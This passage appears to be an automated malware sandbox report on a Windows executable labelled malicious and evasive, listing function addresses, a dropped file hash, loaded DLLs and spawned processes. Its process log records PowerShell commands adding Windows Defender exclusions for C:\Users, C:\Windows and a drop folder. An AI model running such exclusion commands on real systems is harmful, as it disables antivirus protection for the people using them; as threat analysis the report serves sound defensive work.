Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BA01	14_2_0040BA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FA01	14_2_0043FA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042DA01	14_2_0042DA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042DAC1	14_2_0042DAC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BAF1	14_2_0040BAF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409A81	14_2_00409A81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FAA1	14_2_0043FAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BAA1	14_2_0042BAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413B01	14_2_00413B01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DB01	14_2_0040DB01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411B31	14_2_00411B31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411BD1	14_2_00411BD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DBD1	14_2_0040DBD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413BE1	14_2_00413BE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BB81	14_2_0040BB81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409BA1	14_2_00409BA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BBB1	14_2_0042BBB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BC51	14_2_0042BC51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411C71	14_2_00411C71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BC71	14_2_0040BC71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040FC31	14_2_0040FC31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409CC1	14_2_00409CC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DC81	14_2_0040DC81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FC91	14_2_0043FC91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413D11	14_2_00413D11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BD11	14_2_0040BD11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DD31	14_2_0040DD31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FD31	14_2_0043FD31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DDD1	14_2_0040DDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FDD1	14_2_0043FDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BDE1	14_2_0042BDE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409DF1	14_2_00409DF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00403D81	14_2_00403D81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411D91	14_2_00411D91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BDB1	14_2_0040BDB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FE61	14_2_0043FE61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411E31	14_2_00411E31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BED1	14_2_0042BED1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BE81	14_2_0040BE81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DE81	14_2_0040DE81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00447F4F	14_2_00447F4F
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BF71	14_2_0040BF71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DFD1	14_2_0040DFD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409FA1	14_2_00409FA1

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe 36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC

Sample file is different than original file name gathered from version info

Source: YYjRtxS70h.exe, 00000000.00000000.1485142901.0000000000652000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe	Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe

Source: classification engine

Classification label: mal88.evad.winEXE@21/24@4/5

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fimw0nw.epw.ps1

Jump to behavior

Source: YYjRtxS70h.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: YYjRtxS70h.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: YYjRtxS70h.exe	Virustotal: Detection: 62%
Source: YYjRtxS70h.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\YYjRtxS70h.exe "C:\Users\user\Desktop\YYjRtxS70h.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows	Jump to behavior

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
